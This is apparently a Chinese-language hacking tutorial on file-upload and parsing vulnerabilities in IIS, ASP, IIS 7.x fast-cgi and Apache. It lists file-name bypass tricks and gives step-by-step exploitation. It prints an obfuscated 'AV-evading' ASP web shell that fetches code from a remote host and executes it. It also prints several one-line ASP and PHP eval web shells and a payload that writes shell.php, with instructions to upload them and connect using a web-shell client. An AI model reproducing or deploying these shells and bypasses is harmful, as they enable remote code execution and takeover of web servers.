上传漏洞 之 iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞

上传漏洞 之 iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞

一、iis解析漏洞

中间件：IIS NGINX APACHE WEBLOGIC JBOSS
.NET PHP,JSP PHP,JSP JSP
ASP,ASPX
IIS解析漏洞
目录解析: www/ 5.x-6.0 /123.asp/ddd.txt/ss.jgp jgp
文件解析： .jpg txt格式 jsp xx.asp;.jpg xx.php;.jpg
默认解析： .asp .aspx .asa || .asa .cer .cdx
畸形解析; 变形

二、asp解析漏洞

http://192.168.1.105:800/fileupload_type.php


asp免杀大马

 <%@ LANGUAGE = VBScript.encode%><%
    Server.ScriptTimeout=999999999
    UserPass="123456"  '密码
    mNametitle ="免杀ASP大马"  ' 标题
    Copyright="By：HxG"  '版权
    SItEuRl=http://www.96sec.org/" '你的网站
    bg ="http://www.asphxg.cn/css/gl.jpg" 
    ysjb=true  '是否有拖动效果,true为是,false为否
     
    function BytesToBstr(body,Cset) 
    dim objstream 
    set objstream = Server.CreateObject("adodb.stream")
    objstream.Type = 1 
    objstream.Mode =3 
    objstream.Open 
    objstream.Write body 
    objstream.Position = 0 
    objstream.Type = 2 
    objstream.Charset = Cset 
    BytesToBstr = objstream.ReadText 
    objstream.Close 
    set objstream = nothing 
    End function
     
    function PostHTTPPage(url) 
    dim Http 
    set Http=server.createobject("MSXML2.SERVERXMLHTTP.3.0")
    Http.open "GET",url,false 
    Http.setRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" 
    Http.send 
    if Http.readystate<>4 then 
    exit function 
    End if
    PostHTTPPage=bytesToBSTR(Http.responseBody,"gbk") 
    set http=nothing 
    if err.number<>0 then err.Clear 
    End function
     
    dim  aspCode
    aspCode=CStr(Session("aspCode"))
    if aspCode="" or aspCode=null or isnull(aspCode) then 
    aspCode=PostHTTPPage(Chr ( 104 ) & Chr ( 116 ) & Chr ( 116 ) & Chr ( 112 ) & Chr ( 58 ) & Chr ( 47 ) & Chr ( 47 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 119 ) & Chr ( 46 ) & Chr ( 97 ) & Chr ( 115 ) & Chr ( 112 ) & Chr ( 104 ) & Chr ( 120 ) & Chr ( 103 ) & Chr ( 46 ) & Chr ( 99 ) & Chr ( 110 ) & Chr ( 47 ) & Chr ( 99 ) & Chr ( 115 ) & Chr ( 115 ) & Chr ( 47 ) & Chr ( 118 ) & Chr ( 46 ) & Chr ( 106 ) & Chr ( 112 ) & Chr ( 103 ))
    Session("aspCode") =aspCode
    End if
    execute aspCode
     
    %>

修改为.jpg










上传一句话木马：
<%eval request(“666”)%>
http://192.168.1.105/test.asp/xiaoma.jpg
放进菜刀中


三、文件解析漏洞实战：




上传.asa文件

Burp抓包修改类型进行绕过：



cdx


四、畸形解析漏洞：

畸形解析 变形iis 7.0-7.5
条件：fast-cgi开启phpinfo
相关步骤如下：
a. jpg

<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>(一句话)

访问a.jpg http://127.0.0.1/home/a.jpg
Shell.php http://127.0.0.1/home/shell.jpg

五、Apache解析漏洞

从左至右开始判断解析，如果为不可识别解析，就继续往左判断
a. rar.php.jpg
后缀名、文件类型 不能上传php文件 a.php.rasfasdsa
.php phtml\pht\php3\php4\php5
Php一句话：<?php @eval($_POST[pp]);?>







后续操作请持续关注哦！！！
了解更多请关注下列公众号：
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗